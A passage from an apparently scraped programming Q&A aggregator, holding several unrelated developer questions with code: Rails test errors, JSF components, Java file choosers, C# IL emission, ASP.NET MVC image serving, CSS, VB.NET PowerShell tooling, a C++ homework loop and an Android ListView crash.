/usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:113:in `send' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:113:in `run' from /home/george/projects/advancedcomfortcs/config/environment.rb:9 from ./test/test_helper.rb:2:in `require' from ./test/test_helper.rb:2 from ./test/unit/customer_test.rb:1:in `require' from ./test/unit/customer_test.rb:1 from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5:in `load' from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5 from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5:in `each' from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5 rake aborted! Command failed with status (1): [/usr/bin/ruby1.8 -I"lib:test" "/usr/lib/ru...] (See full trace by running task with --trace) It seems to have stepped on will_paginate somehow. Does anyone have any suggestions? Is there another way to do the validation I'm attempting to do? Thanks, George

    Read the article

  • JSF 2 -- Composite component with optional listener attribute on f:ajax

    - by Dave Maple
    I have a composite component that looks something like this: <!DOCTYPE html> <html xmlns:h="http://java.sun.com/jsf/html" xmlns:f="http://java.sun.com/jsf/core" xmlns:dm="http://davemaple.com/dm-taglib" xmlns:rich="http://richfaces.org/rich" xmlns:cc="http://java.sun.com/jsf/composite" xmlns:fn="http://java.sun.com/jsp/jstl/functions" xmlns:ui="http://java.sun.com/jsf/facelets" xmlns:a4j="http://richfaces.org/a4j"> <cc:interface> <cc:attribute name="styleClass" /> <cc:attribute name="textBoxStyleClass" /> <cc:attribute name="inputTextId" /> <cc:attribute name="labelText" /> <cc:attribute name="tabindex" /> <cc:attribute name="required" default="false" /> <cc:attribute name="requiredMessage" /> <cc:attribute name="validatorId" /> <cc:attribute name="converterId" /> <cc:attribute name="title"/> <cc:attribute name="style"/> <cc:attribute name="unicodeSupport" default="false"/> <cc:attribute name="tooltip" default="false"/> <cc:attribute name="tooltipText" default=""/> <cc:attribute name="tooltipText" default=""/> <cc:attribute name="onfail" default=""/> <cc:attribute name="onpass" default=""/> </cc:interface> <cc:implementation> <ui:param name="converterId" value="#{! empty cc.attrs.converterId ? cc.attrs.converterId : 'universalConverter'}" /> <ui:param name="validatorId" value="#{! empty cc.attrs.validatorId ? cc.attrs.validatorId : 'universalValidator'}" /> <ui:param name="component" value="#{formFieldBean.getComponent(cc.attrs.inputTextId)}" /> <ui:param name="componentValid" value="#{((facesContext.maximumSeverity == null and empty component.valid) or component.valid) ? true : false}" /> <ui:param name="requiredMessage" value="#{! empty cc.attrs.requiredMessage ? cc.attrs.requiredMessage : msg['validation.generic.requiredMessage']}" /> <ui:param name="clientIdEscaped" value="#{fn:replace(cc.clientId, ':', '\\\\\\\\:')}" /> <h:panelGroup layout="block" id="#{cc.attrs.inputTextId}ValidPanel" style="display:none;"> <input type="hidden" id="#{cc.attrs.inputTextId}Valid" value="#{componentValid}" /> </h:panelGroup> <dm:outputLabel for="#{cc.clientId}:#{cc.attrs.inputTextId}" id="#{cc.attrs.inputTextId}Label">#{cc.attrs.labelText}</dm:outputLabel> <dm:inputText styleClass="#{cc.attrs.textBoxStyleClass}" tabindex="#{cc.attrs.tabindex}" id="#{cc.attrs.inputTextId}" required="#{cc.attrs.required}" requiredMessage="#{requiredMessage}" title="#{cc.attrs.title}" unicodeSupport="#{cc.attrs.unicodeSupport}"> <f:validator validatorId="#{validatorId}" /> <f:converter converterId="#{converterId}" /> <cc:insertChildren /> <f:ajax event="blur" execute="@this" render="#{cc.attrs.inputTextId}ValidPanel #{cc.attrs.inputTextId}Msg" onevent="on#{cc.attrs.inputTextId}Event" /> </dm:inputText> <rich:message for="#{cc.clientId}:#{cc.attrs.inputTextId}" id="#{cc.attrs.inputTextId}Msg" style="display: none;" /> <script> function on#{cc.attrs.inputTextId}Event(e) { if(e.status == 'success') { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').trigger($('##{cc.attrs.inputTextId}Valid').val()=='true'?'pass':'fail'); } } $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').bind('fail', function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}, ##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Label, ##{cc.attrs.inputTextId}Msg, ##{cc.id}Msg').addClass('error'); $('##{cc.id}Msg').html($('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Msg').html()); #{cc.attrs.onfail} }).bind('pass', function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}, ##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Label, ##{cc.attrs.inputTextId}Msg, ##{cc.id}Msg').removeClass('error'); $('##{cc.id}Msg').html($('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Msg').html()); #{cc.attrs.onpass} }); </script> <a4j:region rendered="#{facesContext.maximumSeverity != null and !componentValid}"> <script> $(document).ready(function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').trigger('fail'); }); </script> </a4j:region> </cc:implementation> </html> I'd like to be able to add an optional "listener" attribute which if defined would add an event listener to my f:ajax but I'm having trouble figuring out how to accomplish this. Any help would be appreciated.

    Read the article

  • adjust selected File to FileFilter in a JFileChooser

    - by amarillion
    I'm writing a diagram editor in java. This app has the option to export to various standard image formats such as .jpg, .png etc. When the user clicks File-Export, you get a JFileChooser which has a number of FileFilters in it, for .jpg, .png etc. Now here is my question: Is there a way to have the extension of the default adjust to the selected file filter? E.g. if the document is named "lolcat" then the default option should be "lolcat.png" when the png filter is selected, and when the user selects the jpg file filter, the default should change to "lolcat.jpg" automatically. Is this possible? How can I do it? edit: Based on the answer below, I wrote some code. But it doesn't quite work yet. I've added a propertyChangeListener to the FILE_FILTER_CHANGED_PROPERTY, but it seems that within this method getSelectedFile() returns null. Here is the code. package nl.helixsoft; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.beans.PropertyChangeEvent; import java.beans.PropertyChangeListener; import java.io.File; import java.util.ArrayList; import java.util.List; import javax.swing.JButton; import javax.swing.JFileChooser; import javax.swing.JFrame; import javax.swing.filechooser.FileFilter; public class JFileChooserTest { public class SimpleFileFilter extends FileFilter { private String desc; private List<String> extensions; private boolean showDirectories; /** * @param name example: "Data files" * @param glob example: "*.txt|*.csv" */ public SimpleFileFilter (String name, String globs) { extensions = new ArrayList<String>(); for (String glob : globs.split("\\|")) { if (!glob.startsWith("*.")) throw new IllegalArgumentException("expected list of globs like \"*.txt|*.csv\""); // cut off "*" // store only lower case (make comparison case insensitive) extensions.add (glob.substring(1).toLowerCase()); } desc = name + " (" + globs + ")"; } public SimpleFileFilter(String name, String globs, boolean showDirectories) { this(name, globs); this.showDirectories = showDirectories; } @Override public boolean accept(File file) { if(showDirectories && file.isDirectory()) { return true; } String fileName = file.toString().toLowerCase(); for (String extension : extensions) { if (fileName.endsWith (extension)) { return true; } } return false; } @Override public String getDescription() { return desc; } /** * @return includes '.' */ public String getFirstExtension() { return extensions.get(0); } } void export() { String documentTitle = "lolcat"; final JFileChooser jfc = new JFileChooser(); jfc.setDialogTitle("Export"); jfc.setDialogType(JFileChooser.SAVE_DIALOG); jfc.setSelectedFile(new File (documentTitle)); jfc.addChoosableFileFilter(new SimpleFileFilter("JPEG", "*.jpg")); jfc.addChoosableFileFilter(new SimpleFileFilter("PNG", "*.png")); jfc.addPropertyChangeListener(JFileChooser.FILE_FILTER_CHANGED_PROPERTY, new PropertyChangeListener() { public void propertyChange(PropertyChangeEvent arg0) { System.out.println ("Property changed"); String extold = null; String extnew = null; if (arg0.getOldValue() == null || !(arg0.getOldValue() instanceof SimpleFileFilter)) return; if (arg0.getNewValue() == null || !(arg0.getNewValue() instanceof SimpleFileFilter)) return; SimpleFileFilter oldValue = ((SimpleFileFilter)arg0.getOldValue()); SimpleFileFilter newValue = ((SimpleFileFilter)arg0.getNewValue()); extold = oldValue.getFirstExtension(); extnew = newValue.getFirstExtension(); String filename = "" + jfc.getSelectedFile(); System.out.println ("file: " + filename + " old: " + extold + ", new: " + extnew); if (filename.endsWith(extold)) { filename.replace(extold, extnew); } else { filename += extnew; } jfc.setSelectedFile(new File (filename)); } }); jfc.showDialog(frame, "export"); } JFrame frame; void run() { frame = new JFrame(); JButton btn = new JButton ("export"); frame.add (btn); btn.addActionListener (new ActionListener() { public void actionPerformed(ActionEvent ae) { export(); } }); frame.setSize (300, 300); frame.pack(); frame.setVisible(true); } public static void main(String[] args) { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { JFileChooserTest x = new JFileChooserTest(); x.run(); } }); } }

    Read the article

  • Dynamic object property populator (without reflection)

    - by grenade
    I want to populate an object's properties without using reflection in a manner similar to the DynamicBuilder on CodeProject. The CodeProject example is tailored for populating entities using a DataReader or DataRecord. I use this in several DALs to good effect. Now I want to modify it to use a dictionary or other data agnostic object so that I can use it in non DAL code --places I currently use reflection. I know almost nothing about OpCodes and IL. I just know that it works well and is faster than reflection. I have tried to modify the CodeProject example and because of my ignorance with IL, I have gotten stuck on two lines. One of them deals with dbnulls and I'm pretty sure I can just lose it, but I don't know if the lines preceding and following it are related and which of them will also need to go. The other, I think, is the one that pulled the value out of the datarecord before and now needs to pull it out of the dictionary. I think I can replace the "getValueMethod" with my "property.Value" but I'm not sure. I'm open to alternative/better ways of skinning this cat too. Here's the code so far (the commented out lines are the ones I'm stuck on): using System; using System.Collections.Generic; using System.Reflection; using System.Reflection.Emit; public class Populator<T> { private delegate T Load(Dictionary<string, object> properties); private Load _handler; private Populator() { } public T Build(Dictionary<string, object> properties) { return _handler(properties); } public static Populator<T> CreateBuilder(Dictionary<string, object> properties) { //private static readonly MethodInfo getValueMethod = typeof(IDataRecord).GetMethod("get_Item", new [] { typeof(int) }); //private static readonly MethodInfo isDBNullMethod = typeof(IDataRecord).GetMethod("IsDBNull", new [] { typeof(int) }); Populator<T> dynamicBuilder = new Populator<T>(); DynamicMethod method = new DynamicMethod("Create", typeof(T), new[] { typeof(Dictionary<string, object>) }, typeof(T), true); ILGenerator generator = method.GetILGenerator(); LocalBuilder result = generator.DeclareLocal(typeof(T)); generator.Emit(OpCodes.Newobj, typeof(T).GetConstructor(Type.EmptyTypes)); generator.Emit(OpCodes.Stloc, result); int i = 0; foreach (var property in properties) { PropertyInfo propertyInfo = typeof(T).GetProperty(property.Key, BindingFlags.Public | BindingFlags.Instance | BindingFlags.IgnoreCase | BindingFlags.FlattenHierarchy | BindingFlags.Default); Label endIfLabel = generator.DefineLabel(); if (propertyInfo != null && propertyInfo.GetSetMethod() != null) { generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldc_I4, i); //generator.Emit(OpCodes.Callvirt, isDBNullMethod); generator.Emit(OpCodes.Brtrue, endIfLabel); generator.Emit(OpCodes.Ldloc, result); generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldc_I4, i); //generator.Emit(OpCodes.Callvirt, getValueMethod); generator.Emit(OpCodes.Unbox_Any, property.Value.GetType()); generator.Emit(OpCodes.Callvirt, propertyInfo.GetSetMethod()); generator.MarkLabel(endIfLabel); } i++; } generator.Emit(OpCodes.Ldloc, result); generator.Emit(OpCodes.Ret); dynamicBuilder._handler = (Load)method.CreateDelegate(typeof(Load)); return dynamicBuilder; } } EDIT: Using Marc Gravell's PropertyDescriptor implementation (with HyperDescriptor) the code is simplified a hundred-fold. I now have the following test: using System; using System.Collections.Generic; using System.ComponentModel; using Hyper.ComponentModel; namespace Test { class Person { public int Id { get; set; } public string Name { get; set; } } class Program { static void Main() { HyperTypeDescriptionProvider.Add(typeof(Person)); var properties = new Dictionary<string, object> { { "Id", 10 }, { "Name", "Fred Flintstone" } }; Person person = new Person(); DynamicUpdate(person, properties); Console.WriteLine("Id: {0}; Name: {1}", person.Id, person.Name); Console.ReadKey(); } public static void DynamicUpdate<T>(T entity, Dictionary<string, object> properties) { foreach (PropertyDescriptor propertyDescriptor in TypeDescriptor.GetProperties(typeof(T))) if (properties.ContainsKey(propertyDescriptor.Name)) propertyDescriptor.SetValue(entity, properties[propertyDescriptor.Name]); } } } Any comments on performance considerations for both TypeDescriptor.GetProperties() & PropertyDescriptor.SetValue() are welcome...

    Read the article

  • ASp.Net Mvc 1.0 Dynamic Images Returned from Controller taking 154 seconds+ to display in IE8, firef

    - by julian guppy
    I have a curious problem with IE, IIS 6.0 dynamic PNG files and I am baffled as to how to fix.. Snippet from Helper (this returns the URL to the view for requesting the images from my Controller. string url = LinkBuilder.BuildUrlFromExpression(helper.ViewContext.RequestContext, helper.RouteCollection, c = c.FixHeight(ir.Filename, ir.AltText, "FFFFFF")); url = url.Replace("&", "&"); sb.Append(string.Format("<removed id=\"TheImage\" src=\"{0}\" alt=\"\" /", url)+Environment.NewLine); This produces a piece of html as follows:- img id="TheImage" src="/ImgText/FixHeight?sFile=Images%2FUser%2FJulianGuppy%2FMediums%2Fconservatory.jpg&backgroundColour=FFFFFF" alt="" / brackets missing because i cant post an image... even though I dont want to post an image I jsut want to post the markup... sigh Snippet from Controller ImgTextController /// <summary> /// This function fixes the height of the image /// </summary> /// <param name="sFile"></param> /// <param name="alternateText"></param> /// <param name="backgroundColour"></param> /// <returns></returns> [AcceptVerbs(HttpVerbs.Get)] public ActionResult FixHeight(string sFile, string alternateText, string backgroundColour) { #region File if (string.IsNullOrEmpty(sFile)) { return new ImgTextResult(); } // MVC specific change to prepend the new directory if (sFile.IndexOf("Content") == -1) { sFile = "~/Content/" + sFile; } // open the file System.Drawing.Image img; try { img = System.Drawing.Image.FromFile(Server.MapPath(sFile)); } catch { img = null; } // did we fail? if (img == null) { return new ImgTextResult(); } #endregion File #region Width // Sort out the width from the image passed to me Int32 nWidth = img.Width; #endregion Width #region Height Int32 nHeight = img.Height; #endregion Height // What is the ideal height given a width of 2100 this should be 1400. var nIdealHeight = (int)(nWidth / 1.40920096852); // So is the actual height of the image already greater than the ideal height? Int32 nSplit; if (nIdealHeight < nHeight) { // Yes, do nothing, well i need to return the iamge... nSplit = 0; } else { // rob wants to not show the white at the top or bottom, so if we were to crop the image how would be do it // 1. Calculate what the width should be If we dont adjust the heigt var newIdealWidth = (int)(nHeight * 1.40920096852); // 2. This newIdealWidth should be smaller than the existing width... so work out the split on that Int32 newSplit = (nWidth - newIdealWidth) / 2; // 3. Now recrop the image using 0-nHeight as the height (i.e. full height) // but crop the sides so that its the correct aspect ration var newRect = new Rectangle(newSplit, 0, newIdealWidth, nHeight); img = CropImage(img, newRect); nHeight = img.Height; nWidth = img.Width; nSplit = 0; } // No, so I want to place this image on a larger canvas and we do this by Creating a new image to be the size that we want System.Drawing.Image canvas = new Bitmap(nWidth, nIdealHeight, PixelFormat.Format24bppRgb); Graphics g = Graphics.FromImage(canvas); #region Color // Whilst we can set the background colour we shall default to white if (string.IsNullOrEmpty(backgroundColour)) { backgroundColour = "FFFFFF"; } Color bc = ColorTranslator.FromHtml("#" + backgroundColour); #endregion Color // Filling the background (which gives us our broder) Brush backgroundBrush = new SolidBrush(bc); g.FillRectangle(backgroundBrush, -1, -1, nWidth + 1, nIdealHeight + 1); // draw the image at the position var rect = new Rectangle(0, nSplit, nWidth, nHeight); g.DrawImage(img, rect); return new ImgTextResult { Image = canvas, ImageFormat = ImageFormat.Png }; } My ImgTextResult is a class that returns an Action result for me but embedding the image from a memory stream into the response.outputstream. snippet from my ImageResults /// <summary> /// Execute the result /// </summary> /// <param name="context"></param> public override void ExecuteResult(ControllerContext context) { // output context.HttpContext.Response.Clear(); context.HttpContext.Response.ContentType = "image/png"; try { var memStream = new MemoryStream(); Image.Save(memStream, ImageFormat.Png); context.HttpContext.Response.BinaryWrite(memStream.ToArray()); context.HttpContext.Response.Flush(); context.HttpContext.Response.Close(); memStream.Dispose(); Image.Dispose(); } catch (Exception ex) { string a = ex.Message; } } Now all of this works locally and lovely, and indeed all of this works on my production server BUT Only for Firefox, Safari, Chrome (and other browsers) IE has a fit and decides that it either wont display the image or it does display the image after approx 154seconds of waiting..... I have made sure my HTML is XHTML compliant, I have made sure I am getting no Routing errors or crashes in my event log on the server.... Now obviously I have been a muppet and have done something wrong... but what I cant fathom is why in development all works fine, and in production all non IE browsers also work fine, but IE 8 using IIS 6.0 production server is having some kind of problem in returning this PNG and I dont have an error to trace... so what I am looking for is guidance as to how I can debug this problem.

    Read the article

  • Why I can't implement this simple CSS

    - by nXqd
    <!DOCTYPE html> <html lang="en"> <head> <title>Enjoy BluePrint</title> <link rel="stylesheet" href="css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="css/blueprint/print.css" type="text/css" media="print"> <!--[if lt IE 8]><link rel="stylesheet" href="css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <!-- <link rel="stylesheet" href="global.css" type="text/css" media="screen"> --> <script type="text/css"> h1.logo { width:181px; height:181px; background: url("img/logo.png"); text-indent: -9999px; } </script> </head> <body> <div class="container"> <!-- Header --> <div id="header" class="span-24"> <div id="logo" class="span-6"> <h1 class="logo">This is my site</h1> </div> <div id="script" class="span-10"> <p>Frank Chimero is a graphic designer, illustrator, teac`her, maker, writer, thinker-at-large in Portland, Oregon.</p> </div> <div id="contact" class="span-8 last"> contact </div> </div> <!-- Content --> <div id="main-content" class="span-12"> <h3>DISCOVERY</h3> <p>My fascination with the creative process, curiosity, and visual experience informs all of my work in some way. Each piece is the part of an exploration in finding wit, surprise, honesty, and joy in the world around us, then, trying to document those things with all deliberate speed before they vanish.</p><br/> <p>Our creative output can have a myriad intended outcomes: to inform, to persuade or sell, or delight. There are many other creative people who do well in servicing the needs to inform or persuade, but there are not many out there who have taken up the mantle of delighting people. I’ll try my best.</p><br/> <p>It’s not about pretty; it is about beauty. Beauty in form, sure, but also beauty in the fit of a bespoke idea that transcends not only the tasks outlined, but also fulfilling the objectives that caused the work to be produced in the first place.</p><br/> <p>The best creative work connects us by speaking to what we share. From that, we hope to make things that will last. Work made without staying power and lasting relevance leads to audiences that are fickle, strung along on a diet of crumbs.</p><br/> <p>The work should be nourishing in some way, both while a creative person is making it, but also while someone consumes it. When I think of all my favorite books, movies, art and albums, they all make me a little less alone and a little more sentient. Perhaps that is what making is for: to document the things that make us feel most alive.</p> </div> <!-- Side --> <div id="award" class="span-4"> Awards </div> <div id="right-sidebar" class="span-8 last"> Right sidebar </div> </div> </body> </html> I'm 100% sure the code works, and I can't replace image at h1.logo . I try to use live-editing CSS tool and it works fine . Thanks for reading :)

    Read the article

  • VB.NET - using textfile as source for menus and textboxes

    - by Kenny Bones
    Hi, this is probably a bit tense and I'm not sure if this is possible at all. But basically, I'm trying to create a small application which contains alot of PowerShell-code which I want to run in an easy matter. I've managed to create everything myself and it does work. But all of the PowerShell code is manually hardcoded and this gives me a huge disadvantage. What I was thinking was creating some sort of dynamic structure where I can read a couple of text files (possible a numerous amount of text files) and use these as the source for both the comboboxes and the richtextbox which provovides as the string used to run in PowerShell. I was thinking something like this: Combobox - "Choose cmdlet" - Use "menucode.txt" as source Richtextbox - Use "code.txt" as source But, the thing is, Powershell snippets need a few arguments in order for them to work. So I've got a couple of comboboxes and a few textboxes which provides as input for these arguments. And this is done manually as it is right now. So rewriting this small application should also search the textfile for some keywords and have the comboboxes and textboxes to replace those keywords. And I'm not sure how to do this. So, would this requre a whole lot of textfiles? Or could I use one textfile and separate each PowerShell cmdlet snippets with something? Like some sort of a header? Right now, I've got this code at the eventhandler (ComboBox_SelectedIndexChanged) If ComboBoxFunksjon.Text = "Set attribute" Then TxtBoxUsername.Visible = True End If If chkBoxTextfile.Checked = True Then If txtboxBrowse.Text = "" Then MsgBox("You haven't choses a textfile as input for usernames") End If LabelAttribute.Visible = True LabelUsername.Visible = False ComboBoxAttribute.Visible = True TxtBoxUsername.Visible = False txtBoxCode.Text = "$users = Get-Content " & txtboxBrowse.Text & vbCrLf & "foreach ($a in $users)" & vbCrLf & "{" & vbCrLf & "Set-QADUser -Identity $a -ObjectAttributes @{" & ComboBoxAttribute.SelectedItem & "='" & TxtBoxValue.Text & "'}" & vbCrLf & "}" If ComboBoxAttribute.SelectedItem = "Outlook WebAccess" Then TxtBoxValue.Visible = False CheckBoxValue.Visible = True CheckBoxValue.Text = "OWA Enabled?" txtBoxCode.Text = "$users = Get-Content " & txtboxBrowse.Text & vbCrLf & "foreach ($a in $users)" & vbCrLf & "{" & vbCrLf & "Set-CASMailbox -Identity $a -OWAEnabled" & " " & "$" & CheckBoxValue.Checked & " '}" & vbCrLf & "}" End If If ComboBoxAttribute.SelectedItem = "MobileSync" Then TxtBoxValue.Visible = False CheckBoxValue.Visible = True CheckBoxValue.Text = "MobileSync Enabled?" Dim value If CheckBoxValue.Checked = True Then value = "0" Else value = "7" End If txtBoxCode.Text = "$users = Get-Content " & txtboxBrowse.Text & vbCrLf & "foreach ($a in $users)" & vbCrLf & "{" & vbCrLf & "Set-QADUser -Identity $a -ObjectAttributes @{msExchOmaAdminWirelessEnable='" & value & " '}" & vbCrLf & "}" End If Else LabelAttribute.Visible = True LabelUsername.Visible = True ComboBoxAttribute.Visible = True txtBoxCode.Text = "Set-QADUser -Identity " & TxtBoxUsername.Text & " -ObjectAttributes @{" & ComboBoxAttribute.SelectedItem & "='" & TxtBoxValue.Text & " '}" If ComboBoxAttribute.SelectedItem = "Outlook WebAccess" Then TxtBoxValue.Visible = False CheckBoxValue.Visible = True CheckBoxValue.Text = "OWA Enabled?" txtBoxCode.Text = "Set-CASMailbox " & TxtBoxUsername.Text & " -OWAEnabled " & "$" & CheckBoxValue.Checked End If If ComboBoxAttribute.SelectedItem = "MobileSync" Then TxtBoxValue.Visible = False CheckBoxValue.Visible = True CheckBoxValue.Text = "MobileSync Enabled?" Dim value If CheckBoxValue.Checked = True Then value = "0" Else value = "7" End If txtBoxCode.Text = "Set-QADUser " & TxtBoxUsername.Text & " -ObjectAttributes @{msExchOmaAdminWirelessEnable='" & value & "'}" End If End If Now, this snippet above lets me either use a text file as a source for each username used in the powershell snippet. Just so you know :) And I know, this is probably coded as stupidly as it gets. But it does work! :)

    Read the article

  • C++ Sentinel/Count Controlled Loop beginning programming

    - by Bryan Hendricks
    Hello all this is my first post. I'm working on a homework assignment with the following parameters. Piecework Workers are paid by the piece. Often worker who produce a greater quantity of output are paid at a higher rate. 1 - 199 pieces completed $0.50 each 200 - 399 $0.55 each (for all pieces) 400 - 599 $0.60 each 600 or more $0.65 each Input: For each worker, input the name and number of pieces completed. Name Pieces Johnny Begood 265 Sally Great 650 Sam Klutz 177 Pete Precise 400 Fannie Fantastic 399 Morrie Mellow 200 Output: Print an appropriate title and column headings. There should be one detail line for each worker, which shows the name, number of pieces, and the amount earned. Compute and print totals of the number of pieces and the dollar amount earned. Processing: For each person, compute the pay earned by multiplying the number of pieces by the appropriate price. Accumulate the total number of pieces and the total dollar amount paid. Sample Program Output: Piecework Weekly Report Name Pieces Pay Johnny Begood 265 145.75 Sally Great 650 422.50 Sam Klutz 177 88.5 Pete Precise 400 240.00 Fannie Fantastic 399 219.45 Morrie Mellow 200 110.00 Totals 2091 1226.20 You are required to code, compile, link, and run a sentinel-controlled loop program that transforms the input to the output specifications as shown in the above attachment. The input items should be entered into a text file named piecework1.dat and the ouput file stored in piecework1.out . The program filename is piecework1.cpp. Copies of these three files should be e-mailed to me in their original form. Read the name using a single variable as opposed to two different variables. To accomplish this, you must use the getline(stream, variable) function as discussed in class, except that you will replace the cin with your textfile stream variable name. Do not forget to code the compiler directive #include < string at the top of your program to acknowledge the utilization of the string variable, name . Your nested if-else statement, accumulators, count-controlled loop, should be properly designed to process the data correctly. The code below will run, but does not produce any output. I think it needs something around line 57 like a count control to stop the loop. something like (and this is just an example....which is why it is not in the code.) count = 1; while (count <=4) Can someone review the code and tell me what kind of count I need to introduce, and if there are any other changes that need to be made. Thanks. [code] //COS 502-90 //November 2, 2012 //This program uses a sentinel-controlled loop that transforms input to output. #include <iostream> #include <fstream> #include <iomanip> //output formatting #include <string> //string variables using namespace std; int main() { double pieces; //number of pieces made double rate; //amout paid per amount produced double pay; //amount earned string name; //name of worker ifstream inFile; ofstream outFile; //***********input statements**************************** inFile.open("Piecework1.txt"); //opens the input text file outFile.open("piecework1.out"); //opens the output text file outFile << setprecision(2) << showpoint; outFile << name << setw(6) << "Pieces" << setw(12) << "Pay" << endl; outFile << "_____" << setw(6) << "_____" << setw(12) << "_____" << endl; getline(inFile, name, '*'); //priming read inFile >> pieces >> pay >> rate; // ,, while (name != "End of File") //while condition test { //begining of loop pay = pieces * rate; getline(inFile, name, '*'); //get next name inFile >> pieces; //get next pieces } //end of loop inFile.close(); outFile.close(); return 0; }[/code]

    Read the article

  • ListView not showing up in fragment

    - by aindurti
    When I insert a listview in a fragment in my application, it doesn't show up after I populate it with items. In fact, the application crashes due to a NullPointerException. Can anybody help me? Here is the detail activity from which I show the fragments. package com.example.sample; import android.content.Intent; import android.os.Bundle; import android.support.v4.app.Fragment; import android.support.v4.app.FragmentTransaction; import android.support.v4.app.NavUtils; import android.widget.ArrayAdapter; import android.widget.ListView; import com.actionbarsherlock.app.ActionBar; import com.actionbarsherlock.app.ActionBar.Tab; import com.actionbarsherlock.app.SherlockFragmentActivity; import com.actionbarsherlock.view.MenuItem; /** * An activity representing a single Course detail screen. This activity is only * used on handset devices. On tablet-size devices, item details are presented * side-by-side with a list of items in a {@link CourseListActivity}. * <p> * This activity is mostly just a 'shell' activity containing nothing more than * a {@link CourseDetailFragment}. */ public class CourseDetailActivity extends SherlockFragmentActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_course_detail); // Show the Up button in the action bar. ActionBar actionBar = getSupportActionBar(); actionBar.setDisplayHomeAsUpEnabled(true); actionBar.setNavigationMode(ActionBar.NAVIGATION_MODE_TABS); // initiating both tabs and set text to it. ActionBar.Tab assignTab = actionBar.newTab().setText("Assignments"); ActionBar.Tab schedTab = actionBar.newTab().setText("Schedule"); ActionBar.Tab contactTab = actionBar.newTab().setText("Contact"); // Create three fragments to display content Fragment assignFragment = new Assignments(); Fragment schedFragment = new Schedule(); Fragment contactFragment = new Contact(); assignTab.setTabListener(new MyTabsListener(assignFragment)); schedTab.setTabListener(new MyTabsListener(schedFragment)); contactTab.setTabListener(new MyTabsListener(contactFragment)); actionBar.addTab(assignTab); actionBar.addTab(schedTab); actionBar.addTab(contactTab); ListView listView = (ListView) findViewById(R.id.assignlist); String[] values = new String[] { "Android", "iPhone", "WindowsMobile", "Blackberry", "WebOS", "Ubuntu", "Windows7", "Max OS X", "Linux", "OS/2" }; // First paramenter - Context // Second parameter - Layout for the row // Third parameter - ID of the TextView to which the data is written // Forth - the Array of data ArrayAdapter<String> adapter = new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, android.R.id.text1, values); // Assign adapter to ListView listView.setAdapter(adapter); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case android.R.id.home: // This ID represents the Home or Up button. In the case of this // activity, the Up button is shown. Use NavUtils to allow users // to navigate up one level in the application structure. For // more details, see the Navigation pattern on Android Design: // // http://developer.android.com/design/patterns/navigation.html#up-vs-back // NavUtils.navigateUpTo(this, new Intent(this, CourseListActivity.class)); return true; } return super.onOptionsItemSelected(item); } class MyTabsListener implements ActionBar.TabListener { public Fragment fragment; public Fragment fragment2; public MyTabsListener(Fragment fragment) { this.fragment = fragment; } @Override public void onTabReselected(Tab tab, FragmentTransaction ft) { } @Override public void onTabSelected(Tab tab, FragmentTransaction ft) { ft.replace(R.id.main_across, fragment); } @Override public void onTabUnselected(Tab tab, FragmentTransaction ft) { ft.remove(fragment); } } } The fragment that I am currently trying to get working is called the Assignments fragment. As you can see in the CourseDetailActvity, I populate smaple items in the listview to see if it the listview shows up. The fragment gets inflated properly, but when I try to add items to the listview, the application crashes! Here is the logcat. 11-17 11:54:28.037: E/AndroidRuntime(282): FATAL EXCEPTION: main 11-17 11:54:28.037: E/AndroidRuntime(282): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.example.sample/com.example.sample.CourseDetailActivity}: java.lang.NullPointerException 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2663) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2679) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread.access$2300(ActivityThread.java:125) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2033) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.os.Handler.dispatchMessage(Handler.java:99) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.os.Looper.loop(Looper.java:123) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread.main(ActivityThread.java:4627) 11-17 11:54:28.037: E/AndroidRuntime(282): at java.lang.reflect.Method.invokeNative(Native Method) 11-17 11:54:28.037: E/AndroidRuntime(282): at java.lang.reflect.Method.invoke(Method.java:521) 11-17 11:54:28.037: E/AndroidRuntime(282): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:868) 11-17 11:54:28.037: E/AndroidRuntime(282): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:626) 11-17 11:54:28.037: E/AndroidRuntime(282): at dalvik.system.NativeStart.main(Native Method) 11-17 11:54:28.037: E/AndroidRuntime(282): Caused by: java.lang.NullPointerException 11-17 11:54:28.037: E/AndroidRuntime(282): at com.example.sample.CourseDetailActivity.onCreate(CourseDetailActivity.java:66) 11-17 11:54:28.037: E/AndroidRuntime(282): at 